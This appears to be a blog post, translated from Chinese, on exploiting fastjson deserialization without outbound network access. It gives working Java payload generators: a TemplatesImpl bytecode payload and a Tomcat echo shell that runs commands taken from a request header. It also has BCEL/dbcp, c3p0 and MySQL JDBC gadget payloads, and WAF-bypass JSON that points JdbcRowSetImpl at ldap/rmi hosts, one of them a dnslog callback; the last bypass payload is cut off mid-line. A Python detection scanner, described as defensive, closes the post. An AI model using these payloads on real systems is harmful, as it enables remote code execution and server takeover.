This uses the echo technique from my earlier analysis of Java deserialization vulnerabilities:

https://www.penson.top/article/av30#toc-heading-2

package com.fastjson不出网;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;
import org.apache.tomcat.util.codec.binary.Base64;

public class TemplatesImpl {
    public static CtClass makeClass() throws CannotCompileException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime());
        clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}", clazz));
        return clazz;
    }

    public static CtClass genPayload(ClassPool pool) throws Exception {
        CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
        if ((clazz.getDeclaredConstructors()).length != 0) {
            clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
        }
        //HTTPServletRequest.class
        //HTTPServletResponse.class
        clazz.addField(CtField.make("static java.util.HashSet/*<Object>*/ h;", clazz));
        clazz.addField(CtField.make("static javax.servlet.http.HttpServletRequest r;", clazz));
        clazz.addField(CtField.make("static javax.servlet.http.HttpServletResponse p;", clazz));
//        clazz.addField(CtField.make("static int depth ;",clazz));
        clazz.addMethod(CtMethod.make("private static boolean i(Object obj){        if(obj==null|| h.contains(obj)){            return true;        }        h.add(obj);        return false;    }", clazz));
//        clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){        Class n=start.getClass();        do{            java.lang.reflect.Field declaredField = null;            java.lang.reflect.Field[] fields = n.getDeclaredFields();            int length = n.getDeclaredFields().length;            for (int i =0 ; i <= length; i++){                declaredField = fields[i];                declaredField.setAccessible(true);                Object o = null;                try{                    o = declaredField.get(start);                    if(!o.getClass().isArray()){                        p(o,depth);                    }else{                        Object[] array = (Object[])o;                        for (int q = 0; q < array.length; q++){                            p(array[q], depth);                        }                    }                }catch (Exception e){                }            }        }while(                (n = n.getSuperclass())!=null        );    }",clazz));
        clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){}", clazz));
        clazz.addMethod(CtMethod.make("    private static void p(Object o, int depth){\n" +
                "        if(depth > 52||(r !=null&& p !=null)){\n" +
                "            return;\n" +
                "        }\n" +
                "        if(!i(o)){\n" +
                "            if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){\n" +
                "                r = (javax.servlet.http.HttpServletRequest)o;\n" +
                "                if(r.getHeader(\"Ctmd\")==null && r.getHeader(\"c\") == null) {\n" +
                "                    r = null;\n" +
                "                }else{\n" +
                "                    try {\n" +
                "                        p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod(\"getResponse\",null).invoke(r,null);\n" +
                "\n" +
                "                    } catch (Exception e) {\n" +
                "                        r = null;\n" +
                "                    }\n" +
                "                }\n" +
                "\n" +
                "            }\n" +
                "            if(r !=null&& p !=null){\n" +
                "                try {\n" +
                "                    \n" +
                "                    if (r.getHeader(\"Ctmd\") != null) {\n" +
                "                        p.addHeader(\"techo\",r.getHeader(\"Ctmd\"));\n" +
                "                    }else {\n" +
                "                        p.getWriter().println(\"$$$\" + new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader(\"c\")).getInputStream()).useDelimiter(\"\\\\A\").next() + \"$$$\");\n" +
                //"                        p.getWriter().println(\"$$$\" +  org.apache.shiro.codec.Base64.encodeToString(new java.util.Scanner(Runtime.getRuntime().exec(org.apache.shiro.codec.Base64.decodeToString(r.getHeader(\"c\"))).getInputStream()).useDelimiter(\"\\\\A\").next().getBytes()) + \"$$$\");\n" +
                "                        p.getWriter().flush();\n" +
                "                        p.getWriter().close();\n" +
                "                    }\n" +
                "                    \n" +
                "\n" +
                "                }catch (Exception e){\n" +
                "                }\n" +
                "                return;\n" +
                "            }\n" +
                "\n" +
                "            F(o,depth+1);\n" +
                "        }\n" +
                "    }", clazz));
        clazz.getDeclaredMethod("F").setBody("{Class n = $1.getClass();\n" +
                "        do{\n" +
                "            java.lang.reflect.Field f = null;\n" +
                "            int l = n.getDeclaredFields().length;\n" +
                "            for (int i = 0; i < l; i++) {\n" +
                "                f = n.getDeclaredFields()[i];\n" +
                "                f.setAccessible(true);\n" +
                "                Object o = null;\n" +
                "                try{\n" +
                "                    o = f.get($1);\n" +
                "\n" +
                "                    if(!o.getClass().isArray()){\n" +
                "                        p(o,$2);\n" +
                "                    }else{\n" +
                "                        Object q = null;\n" +
                "                        Object[] objs = (Object[])o;\n" +
                "                        int len = java.lang.reflect.Array.getLength(o);\n" +
                "                        for (int j = 0; j < len; j++) {\n" +
                "                            q = objs[j];\n" +
                "                            p(q, $2);\n" +
                "                        }\n" +
                "\n" +
                "                    }\n" +
                "\n" +
                "                }catch (Exception e){\n" +
                "                }\n" +
                "            }\n" +
                "\n" +
                "        }while(\n" +
                "                (n = n.getSuperclass())!=null\n" +
                "        );}");
        clazz.addConstructor(CtNewConstructor.make("public dfs(){       r = null;        p = null;        h =new java.util.HashSet/*<Object>*/();        F(Thread.currentThread(),0);    }", clazz));
        return clazz;
    }

    public static void main(String args[]) throws Exception {
        ClassPool aDefault = ClassPool.getDefault();
        CtClass ctClass = genPayload(aDefault);
        ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName())));
        byte[] evilCode = ctClass.toBytecode();
        String encode = Base64.encodeBase64String(evilCode);
        String json = "{" +
                "    \"a\": {" +
                "        \"@type\": \"java.lang.Class\"," +
                "        \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" +
                "        }," +
                "    \"b\": {" +
                "        \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +
                "        \"_bytecodes\": [\"" + encode + "\"]," +
                "        '_name': 'a.b'," +
                "        '_tfactory': {}," +
                "        \"_outputProperties\": {}," +
                "        \"_name\": \"b\"," +
                "        \"_version\": \"1.0\"," +
                "        \"allowedProtocols\": \"all\"" +
                "      }" +
                "}";
        System.out.println(json);
        JSON.parseObject(json, Object.class, Feature.SupportNonPublicField);
    }
}
{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
    },
    "b": {
        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
        "_bytecodes": ["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"],
        '_name': 'a.b',
        '_tfactory': {},
        "_outputProperties": {},
        "_name": "b",
        "_version": "1.0",
        "allowedProtocols": "all"
    }
}


org.apache.tomcat.dbcp.dbcp2.BasicDataSource

This relies on the Tomcat dependency, or on an existing Tomcat environment.

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-dbcp</artifactId>
    <version>9.0.8</version>
</dependency>

Encode the malicious class file into BCEL format (runs only in older Java environments):

exp

package com.fastjson不出网;

import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class dbcp {
    public static void main(String[] args) throws IOException {
        Path path = Paths.get("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\learn\\exp\\Test.class");
        byte[] bytes = Files.readAllBytes(path);
        System.out.println(bytes.length);
        String result = Utility.encode(bytes, true);
        BufferedWriter bw = new BufferedWriter(new FileWriter("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\fastjson不出网\\1.txt"));
        bw.write("$$BCEL$$" + result);
        bw.close();
    }
}

<=1.2.47

{
    "a": {
        "@type": "java.lang.Class",
        "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "b": {
        "@type": "java.lang.Class",
        "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
    },
    "c": {
        "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
        "driverClassLoader": {
            "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        "driverClassName": "###EVIL_CODE###"
    }
}

But this technique only works on older Java versions, and the conditions are still quite strict.

With parseObject it only works when the target type is Object.class; switching to the parse method:

See phith0n's (p神) article:

https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html

phith0n gives a good explanation there.

c3p0 deserialization combined with a CC chain and Tomcat echo

Because c3p0 is so widely used, this one is quite useful; there are many analyses of the c3p0 chain online.

A string beginning with HexAsciiSerializedMap is automatically hex-decoded and passed to native Java deserialization.

package com.fastjson不出网;

import com.alibaba.fastjson.JSON;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;

public class C3p0 {
    public static void main(String[] args) throws Exception {
        // Allecho and CommonsCollections2.echogenerate are the author's own helpers from the
        // earlier echo post; they are not shown on this page.
        Allecho allecho = new Allecho();
        byte[] payload = CommonsCollections2.echogenerate(allecho);
        String HexString = bytesToHexString(payload, payload.length);
        String poc = "{\"e\":{\"@type\":\"java.lang.Class\",\"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"},\"f\":{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverridesAsString\":\"HexAsciiSerializedMap:" + HexString + ";\"}}";
        System.out.println(poc);
//        JSON.parseObject(poc);
    }

    public static byte[] toByteArray(InputStream in) throws IOException {
        byte[] classBytes;
        classBytes = new byte[in.available()];
        in.read(classBytes);
        in.close();
        return classBytes;
    }

    // Upper-case hex of the serialized bytes, as expected after the HexAsciiSerializedMap: prefix.
    public static String bytesToHexString(byte[] bArray, int length) {
        StringBuffer sb = new StringBuffer(length);
        for (int i = 0; i < length; ++i) {
            String sTemp = Integer.toHexString(255 & bArray[i]);
            if (sTemp.length() < 2) {
                sb.append(0);
            }
            sb.append(sTemp.toUpperCase());
        }
        return sb.toString();
    }
}


{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "127.0.0.1", "portToConnectTo": 3306, "info": { "user": "CommonsCollections2", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" }, "databaseToConnectTo": "dbname", "url": "" } }

http://redteam.today/2020/04/18/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget/

https://github.com/depycode/fastjson-c3p0

Fastjson WAF bypass

1. Unicode encoding

{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://t00ls.5cd37009d59fc2c7fc55f2bee57cafab.dnslog.cn/aaa","autoCommit":true}}

2. A payload from a CTF challenge in XCTF 校战“疫”: \x74

{"@\x74ype":"org.apache.commons.configuration.JNDIConfiguration","- prefix":"rmi://xxx.xxx"}

3. \b

{"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}

4. /**/

{"@type":/**/"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":
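As an added defensive example (my own code, not part of the original post or of fastjson itself): a small Python scanner that undoes the four encodings listed above and then flags the autoType shapes this page collects, namely descriptor-wrapped class names, the java.lang.Class cache trick, the AutoCloseable double @type, the c3p0 HexAsciiSerializedMap prefix and the Connector/J autoDeserialize property. The sample bodies are constructed with placeholder hosts, and GADGETS is just the class names that appear on this page.

```python
import re

# Constructed request bodies (not captured traffic). Each mirrors one payload
# shape from the page, with callback hosts replaced by a placeholder.
SAMPLES = {
    "plain": '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://PLACEHOLDER/x","autoCommit":true}',
    "descriptor": '{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://PLACEHOLDER/x","autoCommit":true}',
    "class_cache": '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                   '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://PLACEHOLDER/x","autoCommit":true}}',
    "autocloseable": '{"x":{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection",'
                     '"url":"jdbc:mysql://PLACEHOLDER:3306/t?autoDeserialize=true"}}',
    "c3p0": '{"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",'
            '"userOverridesAsString":"HexAsciiSerializedMap:ACED00057372000D;"}}',
    "unicode": '{"b":{"\\u0040\\u0074\\u0079\\u0070\\u0065":"com.sun.rowset.JdbcRowSetImpl","autoCommit":true}}',
    "hex": '{"@\\x74ype":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://PLACEHOLDER/x"}',
    "backspace": '{"@type":\\b"com.sun.rowset.JdbcRowSetImpl","autoCommit":true}',
    "comment": '{"@type":/**/"Lcom.sun.rowset.JdbcRowSetImpl;","autoCommit":true}',
    "benign": '{"user":"alice","tags":["x","y"],"note":"no polymorphic types here"}',
}

# Gadget entry classes named on the page, compared against the canonical name.
GADGETS = frozenset([
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "org.apache.xbean.propertyeditor.JndiConverter",
    "org.apache.shiro.jndi.JndiObjectFactory",
    "org.apache.commons.configuration.JNDIConfiguration",
    "com.mysql.jdbc.JDBC4Connection",
    "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
    "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
    "sun.rmi.server.MarshalOutputStream",
    "org.apache.commons.io.input.ReaderInputStream",
])

TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')
# <= 1.2.47: java.lang.Class + val loads the class into fastjson's type cache first.
CLASS_CACHE_RE = re.compile(r'"@type"\s*:\s*"java\.lang\.Class"\s*,\s*"val"\s*:\s*"')
# <= 1.2.68: an AutoCloseable expectClass followed by the real @type.
EXPECT_CLASS_RE = re.compile(r'"@type"\s*:\s*"java\.lang\.AutoCloseable"\s*,\s*"@type"')
# c3p0 userOverridesAsString: hex of a Java serialized stream (magic AC ED 00 05).
HEX_SER_RE = re.compile(r'HexAsciiSerializedMap:\s*ACED0005', re.I)
# Connector/J property that makes the driver deserialize BLOB columns.
AUTODESER_RE = re.compile(r'autoDeserialize\W{0,5}true', re.I)


def normalise(body: str) -> str:
    """Undo the lexer-level tricks from the WAF-bypass section so that every
    spelling of the type key becomes the literal text "@type"."""
    # \uXXXX is plain JSON; \xXX is a fastjson extension; both decode in the lexer.
    s = re.sub(r'\\u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), body)
    s = re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)
    # fastjson skips /* ... */ comments between tokens.
    s = re.sub(r'/\*.*?\*/', '', s, flags=re.S)
    # It also treats backspace (0x08) as whitespace; the page writes it as \b.
    # Legitimate \b escapes inside strings are dropped too, which is harmless here.
    return s.replace('\\b', '').replace('\b', '')


def canonical(name: str) -> str:
    """Strip the "[" and "L...;" descriptor wrappers used against the 1.2.41-1.2.43
    deny list; fastjson's TypeUtils.loadClass removes them before the lookup."""
    return re.sub(r'^[\[L]+(?=[a-z])', '', name.rstrip(';'))


def scan(body: str) -> dict:
    """Return the canonical @type names found plus a list of flags; both empty
    means nothing fastjson-specific was seen in the body."""
    s = normalise(body)
    types = [canonical(t) for t in TYPE_RE.findall(s)]
    flags = []
    if types:
        flags.append("autotype")
    if any(t in GADGETS for t in types):
        flags.append("gadget")
    if CLASS_CACHE_RE.search(s):
        flags.append("class-cache")
    if EXPECT_CLASS_RE.search(s):
        flags.append("expect-class")
    if HEX_SER_RE.search(s):
        flags.append("c3p0-hex-serialized")
    if AUTODESER_RE.search(s):
        flags.append("mysql-autodeserialize")
    return {"types": types, "flags": flags}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:14} {scan(body)}")
```

Any @type key at all in a request that the application never expects to carry polymorphic types is worth alerting on; the gadget list only ranks what is already suspicious.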

That is the end of this patchwork; this post is mainly a summary of articles written by the experts.

References:

https://yinwc.github.io/2020/07/21/fastjsonlearn/

https://f5.pm/go-83366.html

https://mp.weixin.qq.com/s/LZt-I3s0dQ_bK9ubEix8iQ

https://choge.top/2020/10/12/fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

https://www.anquanke.com/post/id/239867

https://zeo.cool/2020/07/04/%E7%BA%A2%E9%98%9F%E6%AD%A6%E5%99%A8%E5%BA%93!fastjson%E5%B0%8F%E4%BA%8E1.2.68%E5%85%A8%E6%BC%8F%E6%B4%9ERCE%E5%88%A9%E7%94%A8exp/


Author: penson
Link: https://www.penson.top
Copyright: unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit penson when reposting!